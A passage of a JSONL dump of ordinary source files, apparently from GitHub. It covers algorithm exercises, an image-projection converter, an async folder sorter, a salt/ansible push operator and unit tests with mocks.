input().split())\n if a in graph[b]:\n graph[b].remove(a)\n indegree[a] -= 1\n graph[a].append(b)\n indegree[b] += 1\n else:\n graph[a].remove(b)\n indegree[b] -= 1\n graph[b].append(a)\n indegree[a] += 1\n\n answers.append(topology_sort(indegree, graph, n))\n\nfor ans in answers:\n print(ans)\n","repo_name":"Algorithm-bbackgongdan/Almut-2nd","sub_path":"code/seungwookim99/week5/boy_3665.py","file_name":"boy_3665.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"43"} +{"seq_id":"5888077380","text":"#!/usr/bin/env python3\n\nfrom typing import Dict, List, Union\n\nimport numpy as np\n\nimport torch\n\nfrom .cube2equi_numpy import run as run_numpy\nfrom .cube2equi_torch import run as run_torch\n\n__all__ = [\"Cube2Equi\", \"cube2equi\"]\n\n\nclass Cube2Equi(object):\n r\"\"\"\n params:\n - w_out, h_out (int): equirectangular image size\n - cube_format (str): input cube format(\"dice\", \"horizon\", \"dict\", \"list\")\n - sampling_method (str): defaults to \"default\"\n - mode (str): interpolation mode, defaults to \"bilinear\"\n\n inputs:\n - cubemap (np.ndarray, torch.Tensor, dict, list)\n\n returns:\n - equi (np.ndarray, torch.Tensor)\n \"\"\"\n\n def __init__(\n self,\n w_out: int,\n h_out: int,\n cube_format: str,\n sampling_method: str = \"default\",\n mode: str = \"bilinear\",\n ) -> None:\n assert w_out % 8 == 0 and h_out % 8 == 0\n self.w_out = w_out\n self.h_out = h_out\n self.cube_format = cube_format\n self.sampling_method = sampling_method\n self.mode = mode\n\n def __call__(\n self,\n cubemap: Union[\n np.ndarray,\n torch.Tensor,\n Dict[str, Union[np.ndarray, torch.Tensor]],\n List[Union[np.ndarray, torch.Tensor]],\n ],\n ) -> Union[np.ndarray, torch.Tensor]:\n return cube2equi(\n cubemap=cubemap,\n cube_format=self.cube_format,\n w_out=self.w_out,\n h_out=self.h_out,\n sampling_method=self.sampling_method,\n mode=self.mode,\n )\n\n\ndef cube2equi(\n cubemap: Union[\n np.ndarray,\n torch.Tensor,\n Dict[str, Union[np.ndarray, torch.Tensor]],\n List[Union[np.ndarray, torch.Tensor]],\n ],\n cube_format: str,\n w_out: int,\n h_out: int,\n sampling_method: str = \"default\",\n mode: str = \"bilinear\",\n) -> Union[np.ndarray, torch.Tensor]:\n r\"\"\"\n params:\n - cubemap: Union[\n np.ndarray,\n torch.Tensor,\n Dict[str, Union[np.ndarray, torch.Tensor]],\n List[Union[np.ndarray, torch.Tensor]]]\n - cube_format (str): (\"dice\", \"horizon\", \"dict\", \"list\")\n - w_out (int):\n - h_out (int):\n - sampling_method (str): \"default\"\n - mode (str): \"bilinear\"\n\n return:\n - equi (np.ndarray, torch.Tensor)\n \"\"\"\n\n # Try and detect which type it is (\"numpy\" or \"torch\")\n # FIXME: any cleaner way of detecting?\n _type = None\n if cube_format in (\"dice\", \"horizon\"):\n if isinstance(cubemap, list):\n if isinstance(cubemap[0], np.ndarray):\n _type = \"numpy\"\n elif isinstance(cubemap[0], torch.Tensor):\n _type = \"torch\"\n else:\n raise ValueError\n else:\n if isinstance(cubemap, np.ndarray):\n _type = \"numpy\"\n elif isinstance(cubemap, torch.Tensor):\n _type = \"torch\"\n else:\n raise ValueError\n elif cube_format == \"dict\":\n if isinstance(cubemap, dict):\n if isinstance(cubemap[\"F\"], np.ndarray):\n _type = \"numpy\"\n elif isinstance(cubemap[\"F\"], torch.Tensor):\n _type = \"torch\"\n else:\n raise ValueError\n elif isinstance(cubemap, list):\n if isinstance(cubemap[0][\"F\"], np.ndarray):\n _type = \"numpy\"\n elif isinstance(cubemap[0][\"F\"], torch.Tensor):\n _type = \"torch\"\n else:\n raise ValueError\n else:\n raise ValueError\n elif cube_format == \"list\":\n if isinstance(cubemap[0], list):\n if isinstance(cubemap[0][0], np.ndarray):\n _type = \"numpy\"\n elif isinstance(cubemap[0][0], torch.Tensor):\n _type = \"torch\"\n else:\n raise ValueError\n else:\n if isinstance(cubemap[0], np.ndarray):\n _type = \"numpy\"\n elif isinstance(cubemap[0], torch.Tensor):\n _type = \"torch\"\n else:\n raise ValueError\n else:\n raise ValueError\n\n if _type == \"numpy\":\n return run_numpy(\n cubemap=cubemap,\n cube_format=cube_format,\n w_out=w_out,\n h_out=h_out,\n sampling_method=sampling_method,\n mode=mode,\n )\n elif _type == \"torch\":\n return run_torch(\n cubemap=cubemap,\n cube_format=cube_format,\n w_out=w_out,\n h_out=h_out,\n sampling_method=sampling_method,\n mode=mode,\n )\n else:\n raise ValueError\n","repo_name":"brstar96/HDRDatasetGenerator","sub_path":"equilib/cube2equi/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"21838604626","text":"from button import Button\n\n# A child class of button which switches the text when clicking\nclass ButtonSwitch(Button):\n def __init__(self, x, y, width, height, text, color=(255, 255, 255), text_color=(0, 0, 0)):\n super().__init__(x, y, width, height, text, color, text_color)\n self.options = [\"BFS\",\"DFS\",\"WALK\",\"MAZE\"]\n \n def switch(self,screen):\n # Queue system\n temp = self.options.pop(0)\n self.options.append(temp)\n\n # Change text on screen\n self.text = f\"Type: {self.options[0]}\"\n self.draw(screen)","repo_name":"ElijahSadorra/Path-Finding","sub_path":"buttonSwitch.py","file_name":"buttonSwitch.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"70532152450","text":"import pytest\nfrom json import loads\nfrom collections import Counter\nfrom bson import ObjectId\n\nimport src.database as db\nfrom src.utils import LANGUAGE_MAP\nfrom src.models import TASK_TYPES\nfrom tests.Setup import Setup\nfrom tests.utils import QUESTION_MAP\n\n\nclass TestTask(Setup):\n\n @pytest.fixture(autouse=True)\n def setUp(self, init_db, fake_user, fake_task):\n self.set_app()\n self.generate_user(fake_user)\n self.task = self.generate_task(fake_task)\n\n self.endpoint = {\n 'path': f\"/api/task/{self.task['id']}/?auth_token={self.auth_token}\"\n }\n\n def modify_task(self, task_type):\n self.task['access_type'] = task_type\n self.task['_id'] = self.task.pop('id', '')\n qns = self.task.pop('question_list', [])\n self.task['languages'] = [LANGUAGE_MAP[x] for x in self.task['languages']]\n self.task['question_count'] = dict(Counter([QUESTION_MAP[x['question_type']] for x in qns]))\n self.task['single_view_stats'] = {}\n if task_type == 'single-view':\n self.task['single_view_stats'] = {'assigned': 0, 'annotated': 0, 'unassigned': len(qns)}\n\n @pytest.mark.xfail(reason='Date formatted in backend, should be done in frontend')\n @pytest.mark.parametrize('task_type', TASK_TYPES)\n def test__get_task(self, task_type):\n task_id = ObjectId(self.task['id'])\n db.mongo_db.task.update_one({'_id': task_id}, {\"$set\": {'access_type': task_type}})\n self.modify_task(task_type)\n\n response = self.app.get(**self.endpoint)\n status, data = response.status_code, loads(response.data)['response']\n\n assert status == 200\n assert data == self.task\n","repo_name":"indicwiki-iiit/MCD_Backend","sub_path":"tests/functional/task/test__get_task.py","file_name":"test__get_task.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"70070079489","text":"'''\nGiven an array of integers nums and an integer target, return indices of the two numbers such that they add up to target.\n\nYou may assume that each input would have exactly one solution, and you may not use the same element twice.\n\nYou can return the answer in any order.\n\n \n\nExample 1:\n\nInput: nums = [2,7,11,15], target = 9\nOutput: [0,1]\nOutput: Because nums[0] + nums[1] == 9, we return [0, 1].\nExample 2:\n\nInput: nums = [3,2,4], target = 6\nOutput: [1,2]\nExample 3:\n\nInput: nums = [3,3], target = 6\nOutput: [0,1]\n \n\nConstraints:\n\n2 <= nums.length <= 105\n-109 <= nums[i] <= 109\n-109 <= target <= 109\nOnly one valid answer exists.\n'''\n#由于数据范围过大,所有不合适用散列表,选择用dict作为索引,特殊情况是没有东西\n\nclass Solution:\n def __init__(self, nums, target):\n self.nums = nums\n self.target = target\n def twoSum(self):\n My_Dict = {}\n for i in range(len(self.nums)): #遍历self.nums,优化写法2 https://www.runoob.com/python/python-func-enumerate.html\n #if(My_Dict.get(self.nums[i])):\n # print(\"%s is exists!\"%(self.nums[i]))\n #print(My_Dict.get(self.nums[i])) 没有返回值就是None\n #print(type(My_Dict.get(self.nums[i]))) \n key = self.nums[i]\n pair_key = self.target - key #寻找target匹配\n #print(\"pair_key = \"+str(pair_key))\n if(My_Dict.get(pair_key) != None):\n return [My_Dict.get(pair_key), i]\n else:\n My_Dict.update({key:i})\n print(My_Dict)\n \n return []\n \ndef twoSum(nums, target): #优化写法3\n hashmap={}\n '''\n enumerate会遍历nums,返回两个值,i是下标key,num是nums[i],\n 可以通过enumerate(nums,1)定义索引自定义所以的下标,默认是0\n '''\n for i,num in enumerate(nums):\n if hashmap.get(target - num) is not None:\n return [i,hashmap.get(target - num)]\n hashmap[num] = i #这句不能放在if语句之前,解决list中有重复值或target-num=num的情况\n\n\nif __name__ == \"__main__\":\n \n My_List = []\n target = 6\n s1 = Solution(My_List,target)\n print(s1.twoSum())\n\n","repo_name":"ycshope/python","sub_path":"algorithm/twoSum.py","file_name":"twoSum.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"4024539533","text":"import argparse\nimport asyncio\nimport logging\nfrom time import perf_counter\n\nfrom aiopath import AsyncPath\nimport aioshutil\n\nfrom normalization import normalize\n\n\nEXTENSIONS = {\n (\"JPEG\", \"PNG\", \"JPG\", \"SVG\"): \"images\",\n (\"AVI\", \"MP4\", \"MOV\", \"MKV\"): \"videos\",\n (\"DOC\", \"DOCX\", \"TXT\", \"PDF\", \"XLSX\", \"PPTX\"): \"documents\",\n (\"MP3\", \"OGG\", \"WAV\", \"AMR\"): \"audio\",\n (\"ZIP\", \"GZ\", \"TAR\"): \"archives\",\n \"\": 'unknown'\n}\n\nparser = argparse.ArgumentParser(description='Sorting folder')\nparser.add_argument(\"--source\", \"-s\", help=\"Source folder\", required=True)\nargs = vars(parser.parse_args())\nsource = args.get(\"source\")\n\n\nasync def file_replacement(base_path: AsyncPath, element_path: AsyncPath = None) -> None:\n \"\"\"\n Is used to replacing files from current folder according to file extension.\n :param base_path: given directory\n :param element_path: current directory\n :return: None\n \"\"\"\n file_name = normalize(element_path.stem)\n folder_name = EXTENSIONS.get(\n get_extensions(element_path.suffix[1:]), 'unknown'\n )\n folder_to = base_path.joinpath(folder_name)\n await folder_to.mkdir(exist_ok=True)\n\n if folder_name == 'archives':\n\n try:\n await aioshutil.unpack_archive(element_path, folder_to.joinpath(file_name))\n await element_path.unlink() # To delete archive\n except OSError as e:\n logging.error(e)\n\n else:\n file_name += element_path.suffix\n await element_path.replace(folder_to.joinpath(file_name))\n\n\ndef get_extensions(extension: str) -> tuple:\n \"\"\"\n Is used to get tuple keys using one extension. \\n\n :param extension: is file extensions\n \"\"\"\n for key in EXTENSIONS:\n if extension.upper() in key:\n return key\n\n\nasync def get_folders(base_path: AsyncPath, current_path: AsyncPath = None) -> None:\n \"\"\"\n Is used to get all folders which must be traversed. \\n\n :param base_path: base directory\n :param current_path: current directory\n :return: None\n \"\"\"\n if current_path is None:\n current_path = base_path\n folders.append(current_path)\n\n async for element in current_path.iterdir():\n\n if await element.is_dir() and element not in EXTENSIONS.values():\n folders.append(element)\n await get_folders(base_path=base_path, current_path=element)\n\n\nasync def iterfolder(base_path: AsyncPath, current_path: AsyncPath) -> None:\n \"\"\"\n Is used to traverse directory. \\n\n :param base_path: base directory\n :param current_path: current directory path\n :return: None\n \"\"\"\n start_time = perf_counter() # For time measuring\n logging.debug(f\"started with args: {current_path}\")\n\n async for element in current_path.iterdir():\n\n if await element.is_file():\n await file_replacement(base_path=base_path, element_path=element)\n\n logging.debug(f'done with args: {current_path} in {perf_counter() - start_time}')\n\n\nasync def main() -> None:\n \"\"\"\n Main loop function. \\n\n :return: None\n \"\"\"\n base_path = AsyncPath(source)\n\n logging.info('Getting folders...')\n await get_folders(base_path)\n logging.info('Folders got.')\n\n logging.info(f'Sorting {base_path} ...')\n tasks = [iterfolder(base_path=base_path, current_path=folder) for folder in folders]\n await asyncio.gather(*tasks)\n\n logging.info('Removing empty folders...')\n await remove_empty_folders(base_path)\n logging.info('Empty folders removed.')\n\n\nasync def remove_empty_folders(base_path: AsyncPath) -> None:\n \"\"\"\n Is used to remove all empty folders\n :param base_path: given directory\n :return: None\n \"\"\"\n async for element in base_path.iterdir():\n if element.name not in EXTENSIONS.values() and await element.is_dir():\n await aioshutil.rmtree(element)\n\n\nif __name__ == '__main__':\n\n logging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s [%(levelname)s] %(funcName)s %(message)s',\n )\n\n folders = []\n start_time = perf_counter()\n asyncio.run(main())\n logging.info(f\"Sorted done in {perf_counter() - start_time}sec\")\n","repo_name":"Vaipik/GoIT-PyWeb7","sub_path":"hw6/gather.py","file_name":"gather.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7803174546","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nfrom scipy.spatial import cKDTree\nimport numpy as np\n\n\ndef compute_n(points,interf_points,region_index):\n \n normale=np.zeros([len(points),3])\n \n normale[:,:] = points[:,:] - interf_points[:,:][region_index]\n norm = np.sqrt(np.sum(normale[:,:]**2 , axis=1))\n normale /= norm[:,np.newaxis]\n \n return normale\n \n \ndef calculate_orthogonal_vectors(v): #calculer les deux vecteurs orthonormaux à un vecteur v\n \n # Générer un vecteur aléatoire de même dimension que v\n random_vector = np.random.randn(len(v))\n \n # Calculer le produit vectoriel entre v et le vecteur aléatoire\n cross_product = np.cross(v, random_vector)\n \n # Calculer le produit vectoriel entre v et le produit vectoriel précédent\n orthogonal_vector = np.cross(v, cross_product)\n \n # Normaliser les vecteurs\n cross_product_normalized = cross_product / np.linalg.norm(cross_product)\n orthogonal_vector_normalized = orthogonal_vector / np.linalg.norm(orthogonal_vector)\n \n return cross_product_normalized, orthogonal_vector_normalized\n \n \n","repo_name":"Turbotice/bubbles","sub_path":"bubbles/velocity/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39496181614","text":"from geniusalt.models import Node, Instance, Module, Cluster\nfrom geniusalt.config import LOG_PATH, SALT_BIN, ANSIBLE_BIN, ANSIBLE_PLAYBOOKS, ANSIBLE_MODULE_INIT, ANSIBLE_SSH_USER_KEY, USE_ANSIBLE\nfrom .relation_operator import RelationOperator\nfrom .common import *\n\nfrom threading import Thread\nfrom datetime import datetime\nfrom collections import OrderedDict\nimport os, json\n\n\nclass SimulPush(Thread):\n def __init__(self, node_name, pillar):\n self.node_name=node_name\n self.pillar = pillar\n self.push_result=None\n super().__init__()\n\n def run(self):\n self.push_result = self.pushOneNode()\n\n def get_playbook(mod):\n return os.path.join(ANSIBLE_PLAYBOOKS, mod, ANSIBLE_MODULE_INIT)\n\n def pushOneNode(self):\n ### prepare log storage.\n log_dir = os.path.join(LOG_PATH, self.node_name)\n if not os.path.isdir(log_dir):\n os.makedirs(log_dir)\n _file = 'push_at_{:%Y-%m-%d_%H%M%S}.log'.format(datetime.now())\n log_file = os.path.join(log_dir, _file)\n\n ### make the cmdline string.\n _cmd = ANSIBLE_BIN if USE_ANSIBLE else SALT_BIN\n _node = self.node_name\n _modules = ','.join(self.pillar.keys())\n _pillar = json.dumps(self.pillar)\n\n if USE_ANSIBLE:\n log_ret = []\n for mod in self.pillar:\n for instance in self.pillar[mod]:\n log_ret.append(\"----> push log for instance: {}\".format(instance))\n\n _modules = os.path.join(ANSIBLE_PLAYBOOKS, mod, ANSIBLE_MODULE_INIT)\n _pillar = json.dumps(self.pillar[mod][instance])\n cmd_line = '{} -i {}, {} -e \\'{}\\' --private-key={}'.format(_cmd, _node, _modules, _pillar, ANSIBLE_SSH_USER_KEY)\n\n print(\"\\n===> ansible-playbook: \" + cmd_line)\n with os.popen(cmd_line) as stream:\n for line in stream:\n log_ret.append(line)\n with open(log_file,'at') as log_file_o:\n log_file_o.writelines(log_ret)\n return log_ret\n else:\n cmd_line = '{} {} state.sls {} pillar=\\'{}\\''.format(_cmd, _node, _modules, _pillar)\n\n ### do salt push and write results to log file.\n print(\"\\n===> saltstack: \" + cmd_line)\n with open(log_file,'at') as log_file_o, os.popen(cmd_line) as stream:\n log_ret = [line for line in stream]\n log_file_o.writelines(log_ret)\n return log_ret\n\n\n\nclass PushOperator(Operator):\n fields_defination = {\n 'nodes': ListType(item_type=ObjectType(Node)),\n 'clusters': ListType(item_type=ObjectType(Cluster)),\n 'bind_modules': ListType(item_type=ObjectType(Module)),\n 'bind_instances': ListType(item_type=ObjectType(Instance)),\n '--only-module': BoolType(),\n '--all-instances': BoolType(),\n # '--checkself': BoolType(),\n }\n\n def _check_lock(self, objects, object_type, lock_field='is_lock'):\n for o in objects:\n if getattr(o, lock_field) != 0:\n return self.set_error(\"ERROR: Push action aborted because {} '{}' has been locked.\".format(object_type,o.name))\n return objects\n\n @fields_validator(f_required=[],f_optional=['nodes', 'clusters', 'bind_modules', 'bind_instances', '--only-module', '--all-instances'],\n check_obj_exists=False)\n def push(self):\n \"\"\"\n To push Module or Instance to Nodes. This makes the real installation for a real host.\n Main logic:\n If no module and instance specified, all objects bound on these nodes will be pushed. If you want to push all modules without any instance, use '--only-module'.\n If any module or instance specified, only the specified modules or instances will be pushed to nodes, not all objects bound on nodes.\n If only modules specified, modules will be pushed without any instances. If you want to push all instances in modules, use '--all-instances'.\n \"\"\"\n _chp = self.checked_parameters\n\n ### If specified, to bind Modules or Instances to Nodes first.\n if self.parameters.get('bind_modules') or self.parameters.get('bind_instances'):\n if self.parameters.get('clusters'):\n return self.set_error(\"ERROR: implicit binding is not allowed for cluster objects. \")\n bind_operator = RelationOperator(self.parameters.copy())\n bind_operator.bind()\n if not bind_operator.result:\n return self.set_error(bind_operator.error_message, http_status=bind_operator.http_status)\n\n nodes = _chp.get('nodes')\n ### To check locked objects.\n clusters = self._check_lock(self.pop_field('clusters', default=[]), 'CLuster')\n instances = self._check_lock(self.pop_field('bind_instances', default=[]), 'Instance')\n modules = self._check_lock(self.pop_field('bind_modules', default=[]), 'Module', lock_field='lock_count')\n\n ### BoolType parameters usage checking.\n if (clusters is None) or (instances is None) or (modules is None):\n return None # Means some obj is locked. Push work aborted.\n if (instances or modules) and _chp['--only-module']:\n return self.set_error(\"ERROR: '--only-module' cannot be used with specified instances or modules.\")\n if instances and _chp['--all-instances']:\n return self.set_error(\"ERROR: '--all-instances' cannot be used with specified instances.\")\n\n if not (nodes or clusters):\n return self.set_error(\"ERROR: nodes or clusters must be provide.\")\n if (nodes or instances or modules) and clusters:\n return self.set_error(\"ERROR: clusters cannot be pushed together with other objects. \")\n\n ### To make pillar dict for each node.\n pillar_total = {}\n if not clusters:\n for n in nodes:\n _np = n.pillar # pillars from all bound objects on this nodes with environment evaluated.\n\n if modules and _chp['--all-instances']:\n _pillar = {m.name:_np[m.name] for m in modules}\n else:\n _pillar = {m.name:{} for m in modules + [i.module_belong for i in instances]}\n\n for i in instances:\n _m = i.module_belong.name\n _pillar[_m][i.name] = _np[_m][i.name]\n\n if not _pillar: # Means no module or instance specified.\n _pillar = {m:{} for m in _np} if _chp['--only-module'] else _np\n\n pillar_total[n.name] = _pillar\n else:\n nodes = []\n for c in clusters:\n if not c.bind_instance:\n return self.set_error(\"ERROR: Cluster '{}' did not bind to any instances, nothing to push.\".format(c.name))\n for n in c.node_set.all():\n nodes.append(n)\n _m = c.bind_instance.module_belong.name\n _i = c.bind_instance.name\n _i_pillar = n.pillar[_m][_i]\n _i_pillar.update({'__cluster__': c.pillar}) ### the main purpose\n _pillar = {_m: {_i: _i_pillar}}\n pillar_total[n.name] = _pillar\n\n ### check lock status of nodes to be pushed.\n nodes = self._check_lock(nodes, 'Node')\n\n ### To push objects to real hosts in multi-threading.\n thread_pool = {}\n self.pushlog = OrderedDict()\n for n in nodes:\n if not pillar_total[n.name]:\n self.pushlog[n.name] = [\"Warning: Pushing ignored Node '{}', no object bound on this node.\".format(n.name)]\n else:\n thread_pool[n.name] = SimulPush(n.name, pillar_total[n.name])\n thread_pool[n.name].start()\n for n_name in thread_pool:\n thread_pool[n_name].join()\n self.pushlog[n_name] = thread_pool[n_name].push_result\n","repo_name":"alan011/geniusalt","sub_path":"operators/push_operator.py","file_name":"push_operator.py","file_ext":"py","file_size_in_byte":8077,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"41409107744","text":"#!/usr/bin/env python\n# -*- coding: utf-8; mode: python; py-indent-offset: 4; py-continuation-offset: 4 -*-\n\"\"\"\n\"\"\"\nfrom __future__ import print_function\nimport sys\n\n\nsys.dont_write_bytecode = True\n\nimport os\nimport subprocess\n\n\nsys.path.insert(1, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nfrom pprint import pprint\n\nimport unittest\nfrom unittest import TestCase\n\n# Coverage will always miss one of these depending on the system\n# and what is available.\ntry: # pragma: no cover\n import unittest.mock as mock # pragma: no cover\nexcept: # pragma: no cover\n import mock # pragma: no cover\n\nfrom mock import Mock\nfrom mock import MagicMock\nfrom mock import patch\n\nimport filecmp\nfrom textwrap import dedent\n\ntry:\n from cStringIO import StringIO\nexcept ImportError:\n from io import StringIO\n\nfrom setenvironment import *\n\nfrom .common import *\n\n#===============================================================================\n#\n# General Utility Functions\n#\n#===============================================================================\nglobal_gen_new_ground_truth_files = False\n#global_gen_new_ground_truth_files = True # Re-generate 'ground truth' files, comment out for production.\n\n#===============================================================================\n#\n# General Utility Functions\n#\n#===============================================================================\n\n#===============================================================================\n#\n# Mock Helpers\n#\n#===============================================================================\n\n\n\ndef mock_function_return_1(*args, **kwargs):\n print(\"[mock] Generic function override - returns 1\")\n return 1\n\n\n\ndef mock_distutils_spawn_find_executable_NotFound(*args, **kwargs):\n \"\"\"\n Mock a call to ``distutils.spawn.find_executable()`` that returns None\n \"\"\"\n print(\"[mock] distutils.spawn.find_executable - NotFound\")\n #if True: raise FileNotFoundError(\"Generated by MOCK\")\n return None\n\n\n\ndef mock_shutil_which_None(*args, **kwargs):\n \"\"\"\n Mock a call to ``shutil.which()`` that returns None\n \"\"\"\n print(\"[mock] shutil.which - NotFound\")\n #if True: raise FileNotFoundError(\"Generated by MOCK\")\n return None\n\n\n\nclass mock_popen_status_error_rc0(mock_popen):\n \"\"\"\n Specialization of popen mock.\n\n Simulates the results from a modulecmd operation that had\n an error loading a module (maybe not found). Modulecmd will tend\n to have a message like \"ERROR: could not load module\" in its stderr\n field but it will generally return an exit status of 0.\n \"\"\"\n\n def __init__(self, cmd, bufsize=None, shell=None, stdout=None, stderr=None):\n super(mock_popen_status_error_rc0, self).__init__(cmd, bufsize, shell, stdout, stderr)\n\n def communicate(self):\n print(\"mock_popen> communicate()\")\n stdout = b\"_mlstatus = False\\n\"\n stderr = b\"ERROR: Unable to locate a modulefile for 'gcc/1.2.3'\\n\"\n self.returncode = 0\n return (stdout, stderr)\n\n\n\nclass mock_popen_status_error_rc1(mock_popen):\n \"\"\"\n Specialization of popen mock that will return with error.\n\n Test the condition where modulecmd returned a status of 1 and\n has `ERROR:` in its stderr field.\n \"\"\"\n\n def __init__(self, cmd, stdout=None, stderr=None):\n super(mock_popen_status_error_rc1, self).__init__(cmd, stdout, stderr)\n\n def communicate(self):\n print(\"mock_popen> communicate()\")\n stdout = b\"_mlstatus = False\\n\"\n stderr = b\"ERROR: Unable to locate a modulefile for 'gcc/1.2.3'\\n\"\n self.returncode = 1\n return (stdout, stderr)\n\n\n\n#===============================================================================\n#\n# Tests\n#\n#===============================================================================\n\n\n\nclass SetEnvironmentTest(TestCase):\n \"\"\"\n Main test driver for the SetEnvironment class\n \"\"\"\n\n def setUp(self):\n print(\"\")\n self.maxDiff = None\n self._filename = find_config_ini(filename=\"config_test_setenvironment.ini\")\n\n # Get the location of the unit testing scripts (for file writing tests)\n unit_test_path = os.path.realpath(__file__)\n self.unit_test_file = os.path.basename(unit_test_path)\n self.unit_test_path = os.path.dirname(unit_test_path)\n\n def test_SetEnvironment_Template(self):\n \"\"\"\n Basic template test for SetEnvironment.\n\n This test doesn't really validate any output -- it just runs a basic check.\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 4\n parser.exception_control_compact_warnings = False\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n section = \"CONFIG_A+\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"-----[ TEST END ]------------------------------------------\")\n print(\"OK\")\n return\n\n def test_SetEnvironment_method_parse_all_sections(self):\n \"\"\".ini files have a DEFAULT section that is implied even if it\n doesn't exist. This test makes sure things don't w00f if we parse\n ``DEFAULT``\n \"\"\"\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n parser = SetEnvironment(self._filename)\n parser.debug_level = 5\n parser.exception_control_level = 4\n parser.exception_control_compact_warnings = False\n\n print(\"-----[ TEST BEGIN ]----------------------------------------\")\n section = \"ENVVAR_SET_FOO\"\n print(\"Section : {}\".format(section))\n\n # parse a section\n parser.parse_all_sections()\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n # check one of the sections parsed\n actions_expected = [{'op': 'envvar_set', 'envvar': 'FOO', 'value': 'BAR'}]\n actions_actual = parser.actions[section]\n self.assertListEqual(actions_expected, actions_actual)\n for i in range(len(actions_expected)):\n self.assertDictEqual(actions_expected[i], actions_actual[i])\n\n print(\"-----[ TEST END ]------------------------------------------\")\n print(\"OK\")\n return\n\n def test_SetEnvironment_load_envvars_sec(self):\n \"\"\"\n Load just the section that contains the ENVVAR commands.\n \"\"\"\n section = \"CONFIG_A\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n #parser.exception_control_level = 4\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_load_modules_sec(self):\n \"\"\"\n Load just the section that contains the MODULE commands.\n \"\"\"\n section = \"CONFIG_B\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n #parser.exception_control_level = 4\n\n # parse a section\n data = parser.parse_section(section)\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"OK\")\n return\n\n def test_SetEnvironment_property_actions_default(self):\n \"\"\"\n Test the ``actions`` property default value.\n \"\"\"\n section = \"CONFIG_A+\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n # Check the default value\n actions_default_expected = {}\n actions_default_actual = parser.actions\n print(\"Default `actions` property = {}\".format(actions_default_actual))\n self.assertEqual(\n actions_default_actual,\n actions_default_expected,\n msg=\"Default actions property value should be `{}`\"\n )\n\n print(\"OK\")\n\n def test_SetEnvironment_property_actions_setter(self):\n \"\"\"\n Test the ``actions`` property setter\n \"\"\"\n section = \"CONFIG_A+\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n\n # Check a valid assignment\n actions_value_new = {}\n parser.actions = actions_value_new\n parser_actions_expected = actions_value_new\n parser_actions_actual = parser.actions\n self.assertDictEqual(parser_actions_actual, parser_actions_expected)\n\n # Check an invalid type assignment\n actions_value_new = None\n with self.assertRaises(TypeError):\n parser.actions = actions_value_new\n\n print(\"OK\")\n\n def test_SetEnvironment_method_print_actions(self):\n \"\"\"\n Coverage check in actions print_actions\n\n Mostly this test just ensures we're getting coverage.\n\n Todo: add a value check to the output at some point. For now, it doesn't make\n sense due to ongoing development.\n \"\"\"\n section = \"CONFIG_A+\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 2\n #parser.exception_control_level = 4\n\n # parse a section\n data = parser.parse_section(section)\n\n # inject an 'unknown-op' into the actions list.\n parser.actions[section].append({'module': '???', 'op': 'unknown-op', 'value': '???'})\n\n # Pretty print the actions (unchecked)\n print(\"\")\n parser.pretty_print_actions(section)\n\n print(\"OK\")\n\n def test_SetEnvironment_handler_envvar_remove(self):\n \"\"\"\n Additional checks for envvar_remove\n \"\"\"\n section = \"CONFIG_TEST_ENVVAR_REMOVE\"\n\n print(\"\\n\")\n print(\"Load file: {}\".format(self._filename))\n print(\"Section : {}\".format(section))\n\n parser = SetEnvironment(self._filename)\n parser.debug_level = 1\n #parser.exception_control_level = 4\n\n # parse a section\n data = parser.parse_section(section)\n\n # Validate the output\n actions_expected = [\n {\n 'op': 'module_use', 'module': None, 'value': '/foo/bar/baz'\n }, {\n 'op': 'envvar_set', 'envvar': 'BAR', 'value': 'foo'\n }\n ]\n\n print(\"Verify Matching 